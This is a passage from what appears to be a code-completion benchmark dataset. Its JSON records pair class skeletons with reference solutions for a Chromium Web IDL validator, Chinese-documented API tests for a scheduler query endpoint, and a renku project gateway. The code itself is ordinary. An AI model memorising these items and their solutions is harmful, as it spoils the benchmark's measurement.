\"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000486", "length_bytes": 2079, "license_type": "permissive", "methods": [{"docstring": "Instantiates with web_idl.Database.", "name": "__init__", "signature": "def __init__(self, web_idl_database)"}, {"docstring": "Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.", "name": "execute", "signature": "def execute(self, rule_store, report_error)"}], "n_methods": 2, "prompt": "Implement the Python class `Validator` described below.\n\nClass description:\nProvides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\n\nMethod signatures and docstrings:\n- def __init__(self, web_idl_database): Instantiates with web_idl.Database.\n- def execute(self, rule_store, report_error): Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.", "prompted_full_text": "Implement the Python class `Validator` described below.\n\nClass description:\nProvides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\n\nMethod signatures and docstrings:\n- def __init__(self, web_idl_database): Instantiates with web_idl.Database.\n- def execute(self, rule_store, report_error): Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\n\n<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "revision_id": "a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c", "skeleton": "<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/blink/renderer/bindings/scripts/validator/framework/validator.py", "source_repo": "chromium/chromium", "split": "test", "star_events_count": 17408} {"blob_id": "706e065d5a7f1fe0b5b92beff9432613340340a9", "bodies": ["keyword = '%student%'\ndata = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue'][1:-1]\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nself.assertEqual(res.status_code, 200, '查询失败')\nquery_results = dict_res(query_results['content'][0])\nquery_result_name = query_results['name']\nself.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')", "data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nquery_results = dict_res(query_results['content'][0])\nquery_result_flowType = query_results['flowType']\nself.assertEqual(res.status_code, 200, '查询失败')\nself.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')", "data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nself.assertEqual(res.status_code, 200, '查询失败')", "data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nfieldValue = data['fieldList'][0]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nself.assertEqual(res.status_code, 200, '查询失败')", "data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\ndata_name = data['fieldList'][0]['fieldValue'][1:-1]\ndata_flowType = data['fieldList'][1]['fieldValue']\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nself.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)", "end_time = get_time()\nstart_time = get_time() - 10 * 24 * 3600 * 1000\ndata = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\nres = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\nquery_results = dict_res(res.text)\nfirst_Time = query_results['content'][0]['lastModifiedTime']\nself.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')"], "bodies_text": "<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "class_docstring": "测试查询schedulers接口 /api/schedulers/query", "class_name": "QuerySchedulers", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000487", "length_bytes": 15511, "license_type": "no_license", "methods": [{"docstring": "根据scheduler name模糊查询", "name": "test_case01", "signature": "def test_case01(self)"}, {"docstring": "根据flowtype-dataflow查询", "name": "test_case02", "signature": "def test_case02(self)"}, {"docstring": "根据flowtype-workflow查询", "name": "test_case03", "signature": "def test_case03(self)"}, {"docstring": "根据flowtype-streamflow查询", "name": "test_case04", "signature": "def test_case04(self)"}, {"docstring": "flowtype+name组合查询scheduler", "name": "test_case05", "signature": "def test_case05(self)"}, {"docstring": "query:根据上次修改时间查询全部的scheduler", "name": "test_case06", "signature": "def test_case06(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001251", "prompt": "Implement the Python class `QuerySchedulers` described below.\n\nClass description:\n测试查询schedulers接口 /api/schedulers/query\n\nMethod signatures and docstrings:\n- def test_case01(self): 根据scheduler name模糊查询\n- def test_case02(self): 根据flowtype-dataflow查询\n- def test_case03(self): 根据flowtype-workflow查询\n- def test_case04(self): 根据flowtype-streamflow查询\n- def test_case05(self): flowtype+name组合查询scheduler\n- def test_case06(self): query:根据上次修改时间查询全部的scheduler", "prompted_full_text": "Implement the Python class `QuerySchedulers` described below.\n\nClass description:\n测试查询schedulers接口 /api/schedulers/query\n\nMethod signatures and docstrings:\n- def test_case01(self): 根据scheduler name模糊查询\n- def test_case02(self): 根据flowtype-dataflow查询\n- def test_case03(self): 根据flowtype-workflow查询\n- def test_case04(self): 根据flowtype-streamflow查询\n- def test_case05(self): flowtype+name组合查询scheduler\n- def test_case06(self): query:根据上次修改时间查询全部的scheduler\n\n<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n<|end_body_0|>\n\n<|body_start_1|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n<|end_body_1|>\n\n<|body_start_2|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_2|>\n\n<|body_start_3|>\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n<|end_body_3|>\n\n<|body_start_4|>\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n<|end_body_4|>\n\n<|body_start_5|>\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n<|end_body_5|>\n", "revision_id": "fc41513af3063169ff1b17d6f01f7074057ceb1f", "skeleton": "<|skeleton|>\nclass QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n <|body_0|>\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n <|body_1|>\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n <|body_2|>\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n <|body_3|>\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n <|body_4|>\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QuerySchedulers:\n \"\"\"测试查询schedulers接口 /api/schedulers/query\"\"\"\n\n def test_case01(self):\n \"\"\"根据scheduler name模糊查询\"\"\"\n keyword = '%student%'\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': keyword, 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue'][1:-1]\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n query_results = dict_res(query_results['content'][0])\n query_result_name = query_results['name']\n self.assertIn(fieldValue, query_result_name, '查询结果中scheduler的name和查询关键词name不一致')\n\n def test_case02(self):\n \"\"\"根据flowtype-dataflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'dataflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n query_results = dict_res(query_results['content'][0])\n query_result_flowType = query_results['flowType']\n self.assertEqual(res.status_code, 200, '查询失败')\n self.assertEqual(fieldValue, query_result_flowType, '查询结果中scheduler关联flowtype和查询关键词flowType不一致')\n\n def test_case03(self):\n \"\"\"根据flowtype-workflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(res.status_code, 200, '查询失败')\n\n def test_case04(self):\n \"\"\"根据flowtype-streamflow查询\"\"\"\n data = {'fieldList': [{'fieldName': 'flowType', 'fieldValue': 'streamflow', 'comparatorOperator': 'LIKE'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n fieldValue = data['fieldList'][0]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n self.assertEqual(res.status_code, 200, '查询失败')\n\n def test_case05(self):\n \"\"\"flowtype+name组合查询scheduler\"\"\"\n data = {'fieldList': [{'fieldName': 'name', 'fieldValue': '%gbj%', 'comparatorOperator': 'LIKE'}, {'fieldName': 'flowType', 'fieldValue': 'workflow', 'comparatorOperator': 'EQUAL'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n data_name = data['fieldList'][0]['fieldValue'][1:-1]\n data_flowType = data['fieldList'][1]['fieldValue']\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n self.assertEqual(200, res.status_code, 'flowtype+name组合查询scheduler失败:%s' % res.text)\n\n def test_case06(self):\n \"\"\"query:根据上次修改时间查询全部的scheduler\"\"\"\n end_time = get_time()\n start_time = get_time() - 10 * 24 * 3600 * 1000\n data = {'fieldList': [{'fieldName': 'lastModifiedTime', 'fieldValue': start_time, 'comparatorOperator': 'GREATER_THAN'}, {'fieldName': 'lastModifiedTime', 'fieldValue': end_time, 'comparatorOperator': 'LESS_THAN'}], 'sortObject': {'field': 'lastModifiedTime', 'orderDirection': 'DESC'}, 'offset': 0, 'limit': 8}\n res = requests.post(url=self.query_scheduler_url, headers=get_headers(HOST_189), data=json.dumps(data))\n query_results = dict_res(res.text)\n first_Time = query_results['content'][0]['lastModifiedTime']\n self.assertEqual(end_time > first_Time > start_time, True, '查询结果的lastModifiedTime不包含在起始时间内,查询结果不正确')\n", "source": "the_stack_v2_python_sparse", "source_path": "singl_api/api_test_cases/cases_for_schedulers_api.py", "source_repo": "bingjiegu/For_API", "split": "test", "star_events_count": 0} {"blob_id": "5621d7acec37e57b04f8a59d9ed31e2759fe722e", "bodies": ["try:\n return self.database_dispatcher.current_database['project']\nexcept KeyError as e:\n raise ValueError() from e", "from renku import __version__\ndatabase = self.database_dispatcher.current_database\ntry:\n if database['project']:\n database.remove_root_object('project')\nexcept KeyError:\n pass\nproject.agent_version = __version__\ndatabase.add_root_object('project', project)"], "bodies_text": "<|body_start_0|>\n try:\n return self.database_dispatcher.current_database['project']\n except KeyError as e:\n raise ValueError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n from renku import __version__\n database = self.database_dispatcher.current_database\n try:\n if database['project']:\n database.remove_root_object('project')\n except KeyError:\n pass\n project.agent_version = __version__\n database.add_root_object('project', project)\n<|end_body_1|>\n", "class_docstring": "Gateway for project database operations.", "class_name": "ProjectGateway", "detected_licenses": ["Apache-2.0", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectGateway:\n \"\"\"Gateway for project database operations.\"\"\"\n\n def get_project(self) -> Project:\n \"\"\"Get project metadata.\"\"\"\n 